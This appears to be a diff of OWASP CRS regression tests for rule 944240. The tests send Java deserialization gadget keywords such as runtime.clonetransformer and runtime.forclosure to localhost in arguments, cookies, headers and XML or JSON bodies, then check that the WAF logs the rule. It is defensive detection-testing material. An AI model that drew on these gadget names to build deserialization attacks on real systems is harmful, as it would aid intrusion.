"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeserializationfactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-70 - desc: "Request header test includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeserializationfactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-71 - desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-72 - desc: "XML element value includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-73 - desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 
Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-74 - desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-75 - desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeserializationfactory\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-76 - desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 
"ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-77 - desc: "Argument test includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-78 - desc: "Argument name includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.whileclosure=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-79 - desc: "Cookie test includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.whileclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-80 - desc: "Cookie name includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.whileclosure=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-81 - desc: "Request header test includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.whileclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-82 - desc: "XML attribute value includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-83 - desc: "XML element value includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-84 - desc: "Nested XML element value includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-85 - desc: "Content-Type text/plain includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-86 - desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.whileclosure\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-87 - desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.whileclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" +meta: + author: "spartantri" + enabled: true + name: "944240.yaml" + description: "Positive tests for rule 944240" +tests: + - test_title: 944240-1 + desc: "Argument test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-2 + desc: "Argument name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-3 + desc: "Cookie test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-4 + desc: "Cookie name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
runtime.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-5 + desc: "Request header test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-6 + desc: "XML attribute value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-7 + desc: "XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-8 + desc: "Nested XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-9 + desc: "Content-Type text/plain includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-10 + desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-11 + desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-12 + desc: "Argument test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-13 + desc: "Argument name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-14 + desc: "Cookie test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-15 + desc: "Cookie name includes keyword 
runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-16 + desc: "Request header test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-17 + desc: "XML attribute value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-18 + desc: "XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.forclosure"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-19
+ desc: "Nested XML element value includes keyword runtime.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.forclosure"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-20
+ desc: "Content-Type text/plain includes keyword runtime.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.forclosure"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-21
+ desc: "Content-Type application/json arg value includes keyword runtime.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"runtime.forclosure\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-22
+ desc: "Content-Type application/json arg name includes
keyword runtime.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"runtime.forclosure\": \"test\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-23
+ desc: "Argument test includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.instantiatefactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-24
+ desc: "Argument name includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.instantiatefactory=test"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-25
+ desc: "Cookie test includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=runtime.instantiatefactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-26
+ desc: "Cookie name includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: runtime.instantiatefactory=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-27
+ desc: "Request header test includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: runtime.instantiatefactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-28
+ desc: "XML attribute value includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+
Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-29
+ desc: "XML element value includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.instantiatefactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-30
+ desc: "Nested XML element value includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.instantiatefactory"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-31
+ desc: "Content-Type text/plain includes keyword runtime.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
